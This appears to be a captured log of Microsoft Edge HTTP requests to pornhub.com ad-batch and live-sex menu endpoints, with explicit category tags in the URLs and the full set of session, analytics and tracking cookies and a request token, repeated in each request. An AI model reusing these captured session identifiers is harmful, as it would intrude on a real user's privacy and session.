https://www.pornhub.com/_xa/ads_batch?ads=true&clientType=mobile&channel[context_pornstar]=Ryan-Ryder%2CBarbie-Sins&channel[context_category]=Anal%2CBig-Dick%2CBig-Tits%2CBlonde%2CBritish%2CHD-Porn%2CHardcore%2CPornstar%2CReality&channel[context_tag]=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel[context_page_type]=video&channel[info]=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22c69963285f9f4fd8517b48c9b3f87127%22%2C%22session_id%22%3A%22418890743901696020%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hbresp=header&hb=C8EB9AC8-BBAD-40B7-B161-BAA87C53B0D0&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%2C%7B%22zone%22%3A2190761%7D%2C%7B%22zone%22%3A2190771%7D%5D%7D%5D&noc=0&dm=www.pornhub.com/_xa

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads_batch?ads=true&clientType=mobile&channel[context_pornstar]=Ryan-Ryder%2CBarbie-Sins&channel[context_category]=Anal%2CBig-Dick%2CBig-Tits%2CBlonde%2CBritish%2CHD-Porn%2CHardcore%2CPornstar%2CReality&channel[context_tag]=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel[context_page_type]=video&channel[info]=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22c69963285f9f4fd8517b48c9b3f87127%22%2C%22session_id%22%3A%22418890743901696020%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hbresp=header&hb=C8EB9AC8-BBAD-40B7-B161-BAA87C53B0D0&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%2C%7B%22zone%22%3A2190761%7D%2C%7B%22zone%22%3A2190771%7D%5D%7D%5D&noc=0&dm=www.pornhub.com/_xa HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144256.49.0.0

Response

HTTP/2.0 202

server: openresty
date: Sat, 05 Oct 2024 16:04:17 GMT
content-length: 0
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/ads_batch?ads=true&clientType=mobile&channel[context_pornstar]=Ryan-Ryder%2CBarbie-Sins&channel[context_category]=Anal%2CBig-Dick%2CBig-Tits%2CBlonde%2CBritish%2CHD-Porn%2CHardcore%2CPornstar%2CReality&channel[context_tag]=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel[context_page_type]=video&channel[info]=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22c69963285f9f4fd8517b48c9b3f87127%22%2C%22session_id%22%3A%22418890743901696020%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=C8EB9AC8-BBAD-40B7-B161-BAA87C53B0D0&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%5D%7D%5D&noc=0&dm=www.pornhub.com/_xa

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads_batch?ads=true&clientType=mobile&channel[context_pornstar]=Ryan-Ryder%2CBarbie-Sins&channel[context_category]=Anal%2CBig-Dick%2CBig-Tits%2CBlonde%2CBritish%2CHD-Porn%2CHardcore%2CPornstar%2CReality&channel[context_tag]=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel[context_page_type]=video&channel[info]=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22c69963285f9f4fd8517b48c9b3f87127%22%2C%22session_id%22%3A%22418890743901696020%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=C8EB9AC8-BBAD-40B7-B161-BAA87C53B0D0&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A5%7D%5D%7D%5D&noc=0&dm=www.pornhub.com/_xa HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144256.49.0.0

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:17 GMT
content-type: application/json
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
headerbiding: 1
set-cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:17 GMT; Secure
set-cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:17 GMT; Secure
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-methods: GET,POST
access-control-allow-headers: Content-Type
access-control-max-age: 86400
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/ads_batch?ads=true&clientType=mobile&channel[context_pornstar]=Ryan-Ryder%2CBarbie-Sins&channel[context_category]=Anal%2CBig-Dick%2CBig-Tits%2CBlonde%2CBritish%2CHD-Porn%2CHardcore%2CPornstar%2CReality&channel[context_tag]=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel[context_page_type]=video&channel[info]=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22c69963285f9f4fd8517b48c9b3f87127%22%2C%22session_id%22%3A%22418890743901696020%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=C8EB9AC8-BBAD-40B7-B161-BAA87C53B0D0&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A2190761%7D%5D%7D%5D&noc=0&dm=www.pornhub.com/_xa

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads_batch?ads=true&clientType=mobile&channel[context_pornstar]=Ryan-Ryder%2CBarbie-Sins&channel[context_category]=Anal%2CBig-Dick%2CBig-Tits%2CBlonde%2CBritish%2CHD-Porn%2CHardcore%2CPornstar%2CReality&channel[context_tag]=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel[context_page_type]=video&channel[info]=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22c69963285f9f4fd8517b48c9b3f87127%22%2C%22session_id%22%3A%22418890743901696020%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=C8EB9AC8-BBAD-40B7-B161-BAA87C53B0D0&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A2190761%7D%5D%7D%5D&noc=0&dm=www.pornhub.com/_xa HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144256.49.0.0

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:17 GMT
content-type: application/json
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
headerbiding: 1
set-cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:17 GMT; Secure
set-cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:17 GMT; Secure
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-methods: GET,POST
access-control-allow-headers: Content-Type
access-control-max-age: 86400
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/ads_batch?ads=true&clientType=mobile&channel[context_pornstar]=Ryan-Ryder%2CBarbie-Sins&channel[context_category]=Anal%2CBig-Dick%2CBig-Tits%2CBlonde%2CBritish%2CHD-Porn%2CHardcore%2CPornstar%2CReality&channel[context_tag]=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel[context_page_type]=video&channel[info]=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22c69963285f9f4fd8517b48c9b3f87127%22%2C%22session_id%22%3A%22418890743901696020%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=C8EB9AC8-BBAD-40B7-B161-BAA87C53B0D0&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A2190771%7D%5D%7D%5D&noc=0&dm=www.pornhub.com/_xa

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads_batch?ads=true&clientType=mobile&channel[context_pornstar]=Ryan-Ryder%2CBarbie-Sins&channel[context_category]=Anal%2CBig-Dick%2CBig-Tits%2CBlonde%2CBritish%2CHD-Porn%2CHardcore%2CPornstar%2CReality&channel[context_tag]=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel[context_page_type]=video&channel[info]=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22c69963285f9f4fd8517b48c9b3f87127%22%2C%22session_id%22%3A%22418890743901696020%22%7D&channel[site]=pornhub&site_id=2&device_type=tablet&hc=C8EB9AC8-BBAD-40B7-B161-BAA87C53B0D0&data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A2190771%7D%5D%7D%5D&noc=0&dm=www.pornhub.com/_xa HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144256.49.0.0

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:17 GMT
content-type: application/json
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
headerbiding: 1
set-cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:17 GMT; Secure
set-cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:17 GMT; Secure
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-methods: GET,POST
access-control-allow-headers: Content-Type
access-control-max-age: 86400
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/ads?zone_id=1845481&site_id=2&preroll_type=json&channel%5Bcontext_tag%5D=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel%5Bcontext_category%5D=Big-Dick%2CBig-Tits%2CBlonde%2CHardcore%2CPornstar%2CReality%2CAnal%2CBritish&channel%5Bcontext_pornstar%5D=Ryan-Ryder%2CBarbie-Sins&channel%5Binfo%5D=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22f67c5f0e01b8ae8ce76159ebfd78927f%22%2C%22session_id%22%3A%22210441633134242866%22%7D&noc=0&cache=1728144256&t_version=2024100303.ded8394&channel%5Bsite%5D=pornhub

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads?zone_id=1845481&site_id=2&preroll_type=json&channel%5Bcontext_tag%5D=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel%5Bcontext_category%5D=Big-Dick%2CBig-Tits%2CBlonde%2CHardcore%2CPornstar%2CReality%2CAnal%2CBritish&channel%5Bcontext_pornstar%5D=Ryan-Ryder%2CBarbie-Sins&channel%5Binfo%5D=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22f67c5f0e01b8ae8ce76159ebfd78927f%22%2C%22session_id%22%3A%22210441633134242866%22%7D&noc=0&cache=1728144256&t_version=2024100303.ded8394&channel%5Bsite%5D=pornhub HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
accept-language: en-US,en;q=0.9
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144256.49.0.0
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:17 GMT
content-type: application/json
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
set-cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:17 GMT; Secure
set-cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:17 GMT; Secure
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-methods: GET,POST
access-control-allow-headers: Content-Type
access-control-max-age: 86400
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/ads_batch?data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A2412681%7D%5D%7D%5D&clientType=mobile&channel[site]=pornhub&channel[context_tag]=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel[context_pornstar]=Ryan-Ryder%2CBarbie-Sins&channel[context_category]=Anal%2CBig-Dick%2CBig-Tits%2CBlonde%2CBritish%2CHD-Porn%2CHardcore%2CPornstar%2CReality&channel[context_page_type]=video&channel[info]=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22c69963285f9f4fd8517b48c9b3f87127%22%2C%22session_id%22%3A%22418890743901696020%22%7D&hc=C8EB9AC8-BBAD-40B7-B161-BAA87C53B0D0&device_type=tablet&site_id=2&dm=www.pornhub.com%2F_xa&_=1728144257299&noc=0

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/ads_batch?data=%5B%7B%22spots%22%3A%5B%7B%22zone%22%3A2412681%7D%5D%7D%5D&clientType=mobile&channel[site]=pornhub&channel[context_tag]=hard-anal-sex%2Cbig-fake-tits%2Cbig-boobs%2Cin-the-ass%2Canal-sex%2Ccum-in-ass%2Cblowjob%2Cblonde-babe%2Cbig-cock%2Ccar-fuck%2Cfakedrivingschool%2Csucking-dick%2Criding-dick&channel[context_pornstar]=Ryan-Ryder%2CBarbie-Sins&channel[context_category]=Anal%2CBig-Dick%2CBig-Tits%2CBlonde%2CBritish%2CHD-Porn%2CHardcore%2CPornstar%2CReality&channel[context_page_type]=video&channel[info]=%7B%22actor_id%22%3A5700661%2C%22content_type%22%3A%22partner%22%2C%22video_id%22%3A457809091%2C%22timestamp%22%3A1728144256%2C%22hash%22%3A%22c69963285f9f4fd8517b48c9b3f87127%22%2C%22session_id%22%3A%22418890743901696020%22%7D&hc=C8EB9AC8-BBAD-40B7-B161-BAA87C53B0D0&device_type=tablet&site_id=2&dm=www.pornhub.com%2F_xa&_=1728144257299&noc=0 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:17 GMT
content-type: application/json
cache-control: private, no-cache, proxy-revalidate, no-store, max-age=0
set-cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:17 GMT; Secure
set-cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:17 GMT; Secure
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-methods: GET,POST
access-control-allow-headers: Content-Type
access-control-max-age: 86400
content-encoding: gzip
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/front/menu_livesex?segment=straight&token=MTcyODE0NDI1NgSzWIOdmf051O6KNDBMCArYKqSqepjDofoht1g3P1RRk6X7g6aqCMTfG0LVS9X2irjVw610Rx1hGTYjYUi13U8.

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /front/menu_livesex?segment=straight&token=MTcyODE0NDI1NgSzWIOdmf051O6KNDBMCArYKqSqepjDofoht1g3P1RRk6X7g6aqCMTfG0LVS9X2irjVw610Rx1hGTYjYUi13U8. HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded; charset=UTF-8
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
